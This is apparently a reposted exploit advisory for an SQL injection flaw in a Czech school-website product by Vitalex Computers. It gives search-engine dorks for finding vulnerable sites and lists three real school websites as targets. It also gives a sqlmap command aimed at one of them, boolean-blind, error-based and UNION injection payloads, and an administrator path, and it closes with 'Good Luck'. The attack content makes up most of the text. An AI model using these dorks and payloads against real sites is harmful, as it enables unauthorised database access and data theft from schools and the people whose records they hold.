Bugs Exploit Vitalex Computers Tvorba školních webů SQL Injection tested on backbox


Information Exploit

[+] Exploit Title: Czech Copyright © 2011 - 2018 |
Vitalex Computers s.r.o. - Tvorba školních webů SQL Injection Vulnerability
[+] Author : Cxsecurity.com and KingSkrupellos from Cyberizm Digital Security Team
[+] Dork 1 : intext:'' Vitalex Computers - Tvorba školních webů'' site:cz
[+] Dork 2 : inurl:''/index.php?type=Blog&id=''  site:cz
[+] Dork 3 : inurl:''/public/printAction.php?id=''
[+] Tested on : BackBox 5.1, Chrome

[+] Other Possible Dorks :
inurl:''/public/printCalendar.php'' site:cz
inurl:''/public/printFood.php'' site:cz
inurl:''/public/script.php'' site:cz
inurl:''/public/setTemplate.php'' site:cz
inurl:''/public/statniSvatky.php'' site:cz

On Target :
- https://www.skolahermanov.cz/mobil/index.php?type=Post&id=366&ref=blog&ids=437
- http://www.zszandov.cz/index.php?type=Post&id=432
- https://www.mzszasada.cz/public/printAction.php?id=164

[+] SQLMAP Poc :
$ sqlmap -u "https://www.mzszasada.cz/public/printAction.php?id=164" --dbs


[+] Poc SQL Injection :
Parameter: id (GET)                                                                                                            Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=164 AND 1041=1041                                                                                                                                                                                                                                                                     
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (FLOOR) Payload: id=164 AND (SELECT 5925 FROM
(SELECT COUNT(*),CONCAT(0x7162627171,
(SELECT (ELT(5925=5925,1))),0x7176627a71,FLOOR(RAND(0)*2))x
    FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
                                     
    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns                           
    Payload: id=164 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627171,                                                              0x52657268506d6d4d63484273527351744e435a5774704c7277517179536a466372
49687765704a58,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL-- zEWq
[+] Poc local Admin : /administrator


Video tutorial


Good Luck.....

Sumber : [https://cxsecurity.com/issue/WLB-2018050236]
Previous
Next Post »